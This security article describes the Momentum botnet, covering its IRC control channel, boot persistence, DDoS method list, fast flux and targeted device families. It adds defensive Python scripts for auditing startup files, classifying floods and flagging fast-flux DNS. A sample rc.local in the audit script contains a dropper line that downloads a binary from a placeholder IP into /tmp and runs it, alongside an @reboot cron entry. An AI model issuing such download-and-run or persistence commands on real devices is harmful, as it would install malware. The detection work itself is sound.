The Momentum botnet is one of the most active attack entities online at the moment.
It is a large network of compromised Linux and IoT hosts that can be used for large-scale denial-of-service campaigns. An unknown hacking group is behind its operation.
The Momentum Botnet Is One Of The Most Dangerous Weapons Encompassing Hundreds of Linux and IoT Hosts
Security researchers have discovered a dangerous new botnet called Momentum that recruits both Linux servers and a wide range of IoT devices. According to the information available so far, the hackers behind the threat use numerous techniques to infect the hosts that form the botnet. The Momentum botnet is considered especially dangerous because its code is cross-compiled for several architectures and platforms, including ARM, Intel, MIPS and Motorola 68020. This means that potential victims include many IoT and Linux devices, both in home offices and in enterprise environments. The botnet can be used to deploy various payloads, including the backdoors used in the large-scale Mirai attacks. Its command-and-control traffic runs over the IRC protocol, which the operators use so that the communication does not raise suspicion with intrusion detection systems. In practice IRC is an old and well-known botnet control channel, so an outbound IRC connection from a camera, DVR or router is itself a strong indicator worth alerting on.
The main distribution technique used by the botnet is automated exploitation of known vulnerabilities in routers and similar network devices. Many network administrators never update the firmware on these devices, which leaves known security bugs unpatched. Automated scanners "sweep" across address ranges and use exploit code to deploy the malware. Once a device is infected, the Momentum botnet establishes persistence so that it starts up every time the device is powered on. Checking a device's startup scripts and cron entries for unexpected commands is therefore a useful first step when triaging a suspected infection.
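The boot-time persistence described above is the kind of thing an analyst can check for without a sample of the bot in hand. The script below is an added example written for this article, not code from the original page or from the Momentum operators; it assumes only that the bot persists through a startup script such as rc.local or an @reboot cron entry, and the patterns, file contents and addresses in it are constructed for illustration rather than taken from a real device.

```python
import re

# Heuristic patterns for commands that a dropper typically leaves behind when it
# stages a payload on a device and wires it into the boot sequence. They are
# generic indicators, not Momentum-specific signatures; the assumption here is
# only that the bot persists through a startup script or a reboot cron entry.
SCRATCH_DIRS = r"/(tmp|dev/shm|var/tmp)/"
SUSPICIOUS_PATTERNS = [
    (re.compile(r"\b(wget|curl|tftp)\b.*\|\s*(sh|bash)\b"),
     "download piped straight into a shell"),
    (re.compile(r"(^|[\s;&|])" + SCRATCH_DIRS + r"\S+"),
     "executable launched from a world-writable directory"),
    (re.compile(r"\bchmod\s+([ugoa]*\+x|[0-7]*7[0-7]*)\s+" + SCRATCH_DIRS),
     "binary made executable in a scratch directory"),
    (re.compile(r"^@reboot\b"),
     "cron entry that runs at every boot"),
]


def audit_startup_script(name, text):
    """Return one finding per non-comment line that matches any pattern.

    Each finding records the file, the 1-based line number, the line itself
    and every reason it was flagged, so an analyst can see at a glance why.
    """
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        reasons = [reason for pattern, reason in SUSPICIOUS_PATTERNS if pattern.search(line)]
        if reasons:
            findings.append({"file": name, "line": lineno, "text": line, "reasons": reasons})
    return findings


# Constructed sample content (not taken from a real device): an rc.local that a
# dropper has appended two lines to, and a root crontab with one @reboot entry.
SAMPLE_RC_LOCAL = """#!/bin/sh -e
# rc.local - executed at the end of each multiuser runlevel
/usr/sbin/dropbear -p 22
cd /tmp; wget http://198.51.100.7/bins/m.arm -O /tmp/.m && chmod 777 /tmp/.m
/tmp/.m &
exit 0
"""

SAMPLE_CRONTAB = """# m h dom mon dow command
@reboot /dev/shm/.x -c 198.51.100.7
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
"""


def audit_sample():
    """Run the audit over both constructed files and return all findings."""
    return (audit_startup_script("/etc/rc.local", SAMPLE_RC_LOCAL)
            + audit_startup_script("/var/spool/cron/crontabs/root", SAMPLE_CRONTAB))


if __name__ == "__main__":
    for f in audit_sample():
        print(f"{f['file']}:{f['line']}: {f['text']}")
        for r in f["reasons"]:
            print(f"    - {r}")
```

On a real device you would feed the function the actual contents of /etc/rc.local, the init.d or systemd unit directory and every user's crontab; the legitimate dropbear and logrotate lines in the sample pass untouched, while the two appended rc.local lines and the @reboot entry are reported with the reason for each.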
The Momentum Botnet Includes an Extensive List of Capabilities
The Momentum botnet can launch a wide variety of DDoS attacks; its command set offers 36 different attack methods against target hosts:
- ACK flooder
- TCP flooding
- ICMP packet flooder
- DNS amplification flooder
- SYN flood
- ExecuteSpoofedSyn Flooder
- FIN flood
- ACK Fragmentation Flood
- Spoofed TCP Fragmentation Flooder
- GRE flood
- TCP connect flooder
- HTTP Flooder
- HTTP flooding
- TCP flooder (frag)
- LDAP amplification flooder
- MEMCACHE amplification flooder
- ACK flood
- SYN flooder
- UDP flooding (DOMINATE)
- Multiple attacks at once
- Random TCP flooder fragmented packet header
- TCP flood
- SYN flood
- SYN flood
- STD Flooder
- STD Flooder
- SYN flooder
- SYN-ACK flood
- TCP-Nulled flooding
- UDP flood
- udp flooder (vulnMix)
- UDP Flooder
- URG attacking
- Spoofed UDP Flooder
- Valve Source Engine Amplification
- TCP Xmas flood
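Most of the methods in that list are distinguished only by the TCP flag combination they send or by the UDP service they abuse as a reflector, which is also how they show up on the victim's side. The following is an added example, written for this article and not part of the original page or of the bot itself: it names a packet's flood type from its TCP flags (SYN, ACK, FIN, URG, SYN-ACK, Xmas, Null, matching the menu above), treats UDP arriving from the DNS, LDAP, memcached or Valve Source Engine ports as reflected amplification traffic, and counts per destination. The packets it runs over are constructed, not a real capture, and the threshold is a placeholder.

```python
from collections import Counter
from dataclasses import dataclass

# TCP header flag bits (RFC 793); the names below match the bot's attack menu.
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

# Standard ports of the UDP services the menu lists as amplifiers. Traffic
# arriving *from* one of these ports is the reflected half of such an attack.
AMPLIFIER_PORTS = {53: "DNS", 389: "LDAP", 11211: "memcached", 27015: "Valve Source Engine"}


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str        # "tcp" or "udp"
    sport: int
    dport: int
    flags: int = 0    # TCP flags; ignored for UDP
    length: int = 0


def classify_tcp_flags(flags):
    """Map a TCP flag byte to the flood type it would belong to."""
    if flags == 0:
        return "TCP-Nulled"
    if flags & (FIN | PSH | URG) == (FIN | PSH | URG):
        return "TCP Xmas"
    if flags & (SYN | ACK) == (SYN | ACK):
        return "SYN-ACK"
    if flags & SYN:
        return "SYN"
    if flags & FIN:
        return "FIN"
    if flags & URG:
        return "URG"
    if flags & ACK:
        return "ACK"
    return "other"


def detect_floods(packets, threshold=50):
    """Count packets per (destination, attack type) and return the buckets that
    cross the threshold. The threshold is per capture window and is a placeholder;
    on a busy link a few thousand per second is more realistic than 50.
    """
    counts = Counter()
    for p in packets:
        if p.proto == "tcp":
            kind = classify_tcp_flags(p.flags) + " flood"
        elif p.sport in AMPLIFIER_PORTS:
            kind = AMPLIFIER_PORTS[p.sport] + " amplification (reflected)"
        else:
            kind = "UDP flood"
        counts[(p.dst, kind)] += 1
    return {key: n for key, n in counts.items() if n >= threshold}


def build_sample_capture():
    """Constructed packets, not a real capture: a spoofed-source SYN flood and a
    memcached reflection against 203.0.113.10, plus a little ordinary traffic."""
    victim = "203.0.113.10"
    pkts = [Packet(f"198.18.{i // 256}.{i % 256}", victim, "tcp", 40000 + i, 80, SYN, 60)
            for i in range(120)]
    pkts += [Packet(f"192.0.2.{1 + i}", victim, "udp", 11211, 40000 + i, 0, 1400)
             for i in range(80)]
    pkts += [Packet(victim, "192.0.2.5", "tcp", 80, 51000 + i, SYN | ACK, 60) for i in range(5)]
    pkts += [Packet("192.0.2.5", victim, "tcp", 51000, 80, ACK | PSH, 200) for _ in range(3)]
    return pkts


if __name__ == "__main__":
    for (dst, kind), n in sorted(detect_floods(build_sample_capture()).items()):
        print(f"{dst}: {n} packets of {kind}")
```

The SYN flood and the memcached reflection both cross the threshold; the victim's own SYN-ACK replies and the handful of ordinary ACK/PSH packets do not. Note that the reflected traffic carries the reflector's address as its source, so blocking by source would hit legitimate DNS or memcached servers rather than the bots that sent the spoofed requests.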
The Momentum botnet also includes capabilities that make it harder to detect and to take down. It does this in three ways: a fast flux technique that keeps the command-and-control infrastructure resilient, the ability to push and run backdoor code, and the exploitation of vulnerabilities on target devices. The Momentum botnet has been found to hijack devices and services across a wide range of products, including the following:
- Several CCTV DVR Models
- ZyXEL Routers
- Huawei Network Routers
- Several Content Sharing Technologies
- D-Link HNAP1
- Realtek SDK UPnP SOAP Technology-Enabled Devices
- JAWS Webserver Implementations
- Vacron NVR
- UPnP SOAP Command Execution
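The fast flux technique mentioned above is visible from the defender's side as a name whose answers change constantly: short TTLs and a large, shifting set of addresses scattered across unrelated networks. The script below is an added example written for this article, not code from the original page or from the botnet; it implements that heuristic over a constructed DNS observation log, with placeholder names and addresses, and the thresholds are assumptions to be tuned against your own resolver data. It also shows the main false positive a practitioner runs into, a CDN name that has a short TTL and many addresses but keeps them in one network.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class DnsAnswer:
    ts: int        # seconds since the start of observation
    qname: str     # name that was looked up
    ttl: int       # TTL of the A record in the answer
    rdata: str     # the A record itself


def summarize(answers):
    """Per name: the distinct addresses seen, the lowest TTL, and how many
    different /16 prefixes those addresses fall into."""
    per_name = defaultdict(lambda: {"ips": set(), "prefixes": set(), "min_ttl": None})
    for a in answers:
        s = per_name[a.qname]
        s["ips"].add(a.rdata)
        s["prefixes"].add(".".join(a.rdata.split(".")[:2]))
        s["min_ttl"] = a.ttl if s["min_ttl"] is None else min(s["min_ttl"], a.ttl)
    return per_name


def flag_fast_flux(answers, max_ttl=300, min_ips=5, min_prefixes=3):
    """Flag names whose answers have a short TTL AND spread over many addresses
    AND those addresses sit in many unrelated networks. A CDN also uses short
    TTLs and many addresses, so the prefix spread does most of the separating;
    treat a hit as a lead to investigate, not as a verdict. Thresholds are
    placeholders."""
    hits = {}
    for name, s in summarize(answers).items():
        if (s["min_ttl"] <= max_ttl and len(s["ips"]) >= min_ips
                and len(s["prefixes"]) >= min_prefixes):
            hits[name] = {"ips": len(s["ips"]), "prefixes": len(s["prefixes"]),
                          "min_ttl": s["min_ttl"]}
    return hits


def build_sample_log():
    """Constructed observations, not real resolver data; addresses are placeholders.
    - irc.flux-c2.test rotates through eight addresses in eight /16s, 60 s TTL
    - static.cdn.test has a 60 s TTL but all of its addresses sit in one /16
    - www.stable.test always returns one address with a long TTL"""
    flux_pool = [f"10.{k}.{k * 3}.{k * 7}" for k in range(1, 9)]
    log = []
    for t in range(0, 600, 60):                  # ten lookups, one a minute
        for j in range(3):                       # three A records per answer
            log.append(DnsAnswer(t, "irc.flux-c2.test", 60,
                                 flux_pool[(t // 60 + j) % len(flux_pool)]))
        log.append(DnsAnswer(t, "static.cdn.test", 60, f"192.0.2.{10 + (t // 60) % 6}"))
        log.append(DnsAnswer(t, "www.stable.test", 3600, "198.51.100.5"))
    return log


if __name__ == "__main__":
    for name, info in flag_fast_flux(build_sample_log()).items():
        print(f"{name}: {info['ips']} addresses across {info['prefixes']} /16s, "
              f"min TTL {info['min_ttl']}s")
```

Only the rotating name is reported: the CDN-style name fails the prefix-spread test and the stable name fails both the TTL and the address-count tests. In production, grouping by ASN instead of by /16 prefix is more accurate, since a flux network of hijacked home devices spans many ISPs while a CDN's addresses belong to one operator.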